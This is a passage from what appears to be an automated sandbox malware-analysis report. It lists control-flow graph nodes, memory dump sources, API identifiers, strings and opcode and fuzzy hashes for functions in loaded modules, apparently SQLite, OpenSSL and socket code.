7ff8a87df3db-7ff8a87df3e0 2970->2975 2979 7ff8a87df160-7ff8a87df187 CreateFileW 2973->2979 2980 7ff8a87df3d2 2974->2980 2981 7ff8a87df388-7ff8a87df38b 2974->2981 2975->2931 2983 7ff8a87df230 2979->2983 2984 7ff8a87df18d-7ff8a87df18f 2979->2984 2980->2975 2985 7ff8a87df393-7ff8a87df3c0 2981->2985 2986 7ff8a87df38d 2981->2986 2982->2966 2987 7ff8a87df234-7ff8a87df237 2983->2987 2988 7ff8a87df191-7ff8a87df1a3 2984->2988 2989 7ff8a87df1df-7ff8a87df1ec 2984->2989 2985->2975 3011 7ff8a87df3c2-7ff8a87df3cd 2985->3011 2986->2985 2991 7ff8a87df267-7ff8a87df26b 2987->2991 2992 7ff8a87df239-7ff8a87df262 call 7ff8a87d8e10 2987->2992 2994 7ff8a87df1a5 2988->2994 2995 7ff8a87df1a7-7ff8a87df1cd call 7ff8a87df7a0 2988->2995 3006 7ff8a87df22c-7ff8a87df22e 2989->3006 3007 7ff8a87df1ee-7ff8a87df1f4 2989->3007 2998 7ff8a87df271-7ff8a87df281 call 7ff8a87d5850 2991->2998 2999 7ff8a87df41f-7ff8a87df42d 2991->2999 2992->2991 2994->2995 3009 7ff8a87df1d1-7ff8a87df1d3 2995->3009 3010 7ff8a87df1cf 2995->3010 3018 7ff8a87df283-7ff8a87df28a 2998->3018 3019 7ff8a87df2de-7ff8a87df2e3 2998->3019 3001 7ff8a87df43d-7ff8a87df456 call 7ff8a87d5850 2999->3001 3002 7ff8a87df42f-7ff8a87df43b 2999->3002 3022 7ff8a87df4b3-7ff8a87df4b6 3001->3022 3023 7ff8a87df458-7ff8a87df45f 3001->3023 3002->3001 3006->2987 3013 7ff8a87df206-7ff8a87df209 3007->3013 3014 7ff8a87df1f6-7ff8a87df204 3007->3014 3016 7ff8a87df1d5-7ff8a87df1d9 3009->3016 3017 7ff8a87df1db 3009->3017 3010->3009 3011->2931 3020 7ff8a87df212-7ff8a87df227 3013->3020 3021 7ff8a87df20b-7ff8a87df210 3013->3021 3014->3013 3014->3020 3016->2983 3016->3017 3017->2989 3027 7ff8a87df2d5 3018->3027 3028 7ff8a87df28c-7ff8a87df296 3018->3028 3025 7ff8a87df3e5-7ff8a87df41a call 7ff8a87dc790 call 7ff8a8890d40 3019->3025 3026 7ff8a87df2e9-7ff8a87df2ee 3019->3026 3020->2979 3021->3006 3021->3020 3030 7ff8a87df4bd 3022->3030 3031 7ff8a87df4b8-7ff8a87df4bb 3022->3031 3032 7ff8a87df461-7ff8a87df46b 3023->3032 3033 7ff8a87df4aa 3023->3033 3025->2931 3026->3025 3034 7ff8a87df2f4-7ff8a87df313 3026->3034 3027->3019 3036 7ff8a87df29e-7ff8a87df2cb 3028->3036 3037 7ff8a87df298 3028->3037 3038 7ff8a87df4c4-7ff8a87df4dc 3030->3038 3031->3038 3039 7ff8a87df473-7ff8a87df4a0 3032->3039 3040 7ff8a87df46d 3032->3040 3033->3022 3034->2922 3036->3019 3052 7ff8a87df2cd-7ff8a87df2d3 3036->3052 3037->3036 3043 7ff8a87df4e2-7ff8a87df4ea 3038->3043 3044 7ff8a87df4de 3038->3044 3039->3022 3057 7ff8a87df4a2-7ff8a87df4a8 3039->3057 3040->3039 3046 7ff8a87df522-7ff8a87df548 3043->3046 3047 7ff8a87df4ec-7ff8a87df500 call 7ff8a8891c90 3043->3047 3044->3043 3046->2931 3055 7ff8a87df502-7ff8a87df51c call 7ff8a884a9f0 3047->3055 3056 7ff8a87df51e 3047->3056 3052->3019 3055->3046 3055->3056 3056->3046 3057->3022
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007$CreateFile
                                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                              • API String ID: 4190464644-3829269058
                                                                                                                                                                                                                                                              • Opcode ID: 9c40d1f821fbff4623cdfebb0691ed0570da433715cefbede5ef862f60455f99
                                                                                                                                                                                                                                                              • Instruction ID: 6f56a526208960dfbc7f519eb604b4001c38a580a8b7081c27dd00913ab66717
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c40d1f821fbff4623cdfebb0691ed0570da433715cefbede5ef862f60455f99
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4028221A4B742A6FB648F21A84477963A0FF94BD5F080235DD4E476A5EF3CE4858F28

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 3275 7ff8b7e53a8c-7ff8b7e53ac8 call 7ff8b7e58538 connect call 7ff8b7e58458 3279 7ff8b7e53ace-7ff8b7e53ad0 3275->3279 3280 7ff8b7e53ad6-7ff8b7e53aed WSAGetLastError * 2 3279->3280 3281 7ff8b7e53b93 3279->3281 3283 7ff8b7e53aef-7ff8b7e53af7 call 7ff8b7e583b8 3280->3283 3284 7ff8b7e53b07-7ff8b7e53b0e 3280->3284 3282 7ff8b7e53b95-7ff8b7e53ba7 3281->3282 3291 7ff8b7e53b69-7ff8b7e53b6e 3283->3291 3292 7ff8b7e53af9-7ff8b7e53b05 3283->3292 3285 7ff8b7e53b1f 3284->3285 3286 7ff8b7e53b10-7ff8b7e53b16 3284->3286 3289 7ff8b7e53b21-7ff8b7e53b23 3285->3289 3286->3285 3288 7ff8b7e53b18-7ff8b7e53b1d 3286->3288 3288->3289 3293 7ff8b7e53b3c-7ff8b7e53b55 3289->3293 3294 7ff8b7e53b25-7ff8b7e53b28 3289->3294 3291->3282 3292->3289 3297 7ff8b7e53b57-7ff8b7e53b67 call 7ff8b7e546bc 3293->3297 3298 7ff8b7e53b70-7ff8b7e53b89 call 7ff8b7e546bc 3293->3298 3295 7ff8b7e53b8f-7ff8b7e53b91 3294->3295 3296 7ff8b7e53b2a-7ff8b7e53b3a WSASetLastError 3294->3296 3295->3282 3296->3282 3297->3281 3297->3291 3298->3281 3304 7ff8b7e53b8b 3298->3304 3304->3295
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$connect
                                                                                                                                                                                                                                                              • String ID: 3'
                                                                                                                                                                                                                                                              • API String ID: 375857812-280543908
                                                                                                                                                                                                                                                              • Opcode ID: 894e3716da3b7a919c91d244c011083b291459dbfbc34c8c541c57ac2b362d5e
                                                                                                                                                                                                                                                              • Instruction ID: 4a37b16abc19593074932f68f65916b4f53b90894b602510d03638efd14f1cfb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894e3716da3b7a919c91d244c011083b291459dbfbc34c8c541c57ac2b362d5e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E3142B1B0CB8A86E7A45F69A44527E7791AF44FD8F040235EF4E82BB5DE3CF8408600
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CertStore$CloseOpen$Collection
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1995843185-0
                                                                                                                                                                                                                                                              • Opcode ID: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
                                                                                                                                                                                                                                                              • Instruction ID: d2f7e093a4d7c21faef387256c4fab8803fc375e076eb756fa2c9176947b3260
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F211D32B5875186E7A4CB1AA90566EA7A2FF84FC4F494034CF4D43BB4DF3CE5469600
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007
                                                                                                                                                                                                                                                              • String ID: sqlite3.connect$sqlite3.connect/handle
                                                                                                                                                                                                                                                              • API String ID: 3568877910-789065793
                                                                                                                                                                                                                                                              • Opcode ID: 7e7ca8c6f3c515788a42e7ce7b9262f0ab8a81d65c1d0820877ef43f56852731
                                                                                                                                                                                                                                                              • Instruction ID: 64c867e0fc7ef6b23371f1374ad0d050439b146f4c60af41618c61f4a97de616
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7ca8c6f3c515788a42e7ce7b9262f0ab8a81d65c1d0820877ef43f56852731
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60A14E32A0AB4286EBA08F2AE84526973A5FB49FD4F046135DF8E87754DF3CD056C709
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                                                                                                              • API String ID: 0-3764764234
                                                                                                                                                                                                                                                              • Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                                                              • Instruction ID: 61e2f6cf4810f9b0dc5a2b3f11aae51f65c9920a41146e19735d60e3b88e1083
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47714E63A4A646A2FB649B15E44437AB3A1FB84BC4F184435CE4D477A5FF3CE881C328
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007FileRead
                                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                              • API String ID: 3505667475-1843600136
                                                                                                                                                                                                                                                              • Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                                                              • Instruction ID: 4049ffb79043673b1a8704ce23217f03b645b72b87e09e9ad410132f13bb9380
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9411432A4AA42A6E310DF25E4445B8B765FBD47C0F584136EA4D43794DF3CE842CF58
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                                                                                                              • API String ID: 1452528299-1722249466
                                                                                                                                                                                                                                                              • Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                                                              • Instruction ID: d123407b77e0adf5bd8a256a9fc4e54f465dc355e93162094eb7ebf8c679b6a4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6A18F32A0EAC2A5FBB49E2594417BD32B9EF61BC4F146431DA0DC6689CF7DE8818741
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                                              • API String ID: 1452528299-4226281315
                                                                                                                                                                                                                                                              • Opcode ID: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
                                                                                                                                                                                                                                                              • Instruction ID: b788c8311bf5e94cf6bc29961f3b7605b0f0a5b93bd8906fb20a6767b7047b27
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72919231A0EAC6A6FB509F25D4407B966B0EF44BC4F686131DE4D8BAA9EF78D8458310
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
                                                                                                                                                                                                                                                              • API String ID: 1452528299-1219543453
                                                                                                                                                                                                                                                              • Opcode ID: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
                                                                                                                                                                                                                                                              • Instruction ID: 4e16e3182d1daac348f5748554057787528c1c37d9f1cf2c73a7ca8d9b2d619c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7419F72A0EEC1A2EB509F15D4842A9B3B1FB44BC4F649131DB0D87AA5EFBDE4518304
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1021210092-0
                                                                                                                                                                                                                                                              • Opcode ID: 512bd52ceaf9c0de34ffa74ee59c230cdbc7db2c8c488b05b8fb4fcd4203aa17
                                                                                                                                                                                                                                                              • Instruction ID: 6fb7779135feb1773a830d00af50d893f31970c959c1c6e3f96ef061f30a00f7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 512bd52ceaf9c0de34ffa74ee59c230cdbc7db2c8c488b05b8fb4fcd4203aa17
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C012CA5A18BCA82E7149B6AF84402E67B0EF88FD4B504131EA4E93B34CE3CF495C710
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: 00007C6113440closesocket
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3342475779-0
                                                                                                                                                                                                                                                              • Opcode ID: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
                                                                                                                                                                                                                                                              • Instruction ID: 03823c4cc9c91f956aba75e062d08a1db615fe292034d2b97fb0b91663fc008c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65F0E861A18B9986E7145B69A54506D73A0EF49FF1B180731EB7A177F4CF3CE485C310
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
